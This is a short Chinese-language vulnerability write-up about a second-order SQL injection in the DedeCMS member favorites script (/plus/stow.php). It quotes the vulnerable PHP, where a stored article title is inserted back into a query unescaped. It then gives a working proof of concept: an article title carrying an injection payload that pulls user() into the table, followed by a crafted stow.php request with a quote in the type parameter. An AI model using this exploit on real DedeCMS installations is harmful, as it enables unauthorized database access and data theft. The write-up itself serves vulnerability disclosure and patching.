Dedecms 会员中心注入漏洞8(二次注入)

漏洞作者: Matt

[php]

/plus/stow.php
if($type=='')
{
    $row = $dsql->GetOne("SELECT * FROM `#@__member_stow` WHERE aid='$aid' 

AND mid='{$ml->M_ID}'");
    if(!is_array($row))
    {
        $dsql->ExecuteNoneQuery("INSERT INTO `#@__member_stow`

(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".addslashes

($arctitle)."','$addtime'); ");
    } else {
		ShowMsg('您已经成功收藏该内容,无需重复收

藏!','javascript:window.close();');
		exit();
	}
} else {
    $row = $dsql->GetOne("SELECT * FROM `#@__member_stow` WHERE 

type='$type' AND (aid='$aid' AND mid='{$ml->M_ID}')");
    if(!is_array($row))
    {
        $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`

(mid,aid,title,addtime,type) VALUES ('".$ml-

>M_ID."','$aid','$title','$addtime','$type'); ");//这里的TITLE是从数据库里

查询出来的,也就是我们发布的文章的标题
    }

[/php]

漏洞证明:

那么soeasy 我们发布一个文章

http://127.0.0.1/dede/member/content_list.php?channelid=1 打开这里发布

文章标题写上 1111',1,2),(8,136,user(),1,2),(1,2,'3

其他随意

然后提交

完了之后查看一下文章的ID

在打开http://127.0.0.1/dede/plus/stow.php?aid=137&type=11%27

把137改成你的文章ID就哦了

14182236cb067ecb3f3fd5fc6b7dd1f4a494bca7

14182244432d1041d0ac6c75bd53583cbc2cd96f

141823009a981167eb1db812b450e76b94c2eed8

1418233608f553838217e3da757a16ce274ce566

 

 

发表评论